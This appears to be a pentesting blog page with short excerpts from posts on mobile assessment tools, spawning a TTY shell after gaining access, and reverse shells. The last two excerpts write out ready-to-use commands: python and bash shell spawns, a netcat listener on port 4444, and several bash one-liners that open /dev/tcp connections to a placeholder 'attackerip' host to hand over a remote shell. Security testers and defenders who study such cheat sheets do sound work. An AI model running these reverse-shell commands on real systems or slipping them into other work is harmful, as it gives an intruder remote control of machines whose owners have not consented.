Pentesting

Setup instructions for mobile application assessment frameworks Passionfruit, Objection and Drozer. ...

Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages. Shell Spawning python -c 'import pty; pty.spawn("/bin/sh")' echo os.system('/bin/bash') ...

There might be several occasions where you might have code execution on a target machine and you sit there wondering what to do next. Well here is what you can do. Setup netcat listener on port 4444. nc -nvlp 4444 Bash exec /bin/bash 0&0 2>&0 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done bash -i >& /dev/tcp/attackerip/4444 0>&1 ...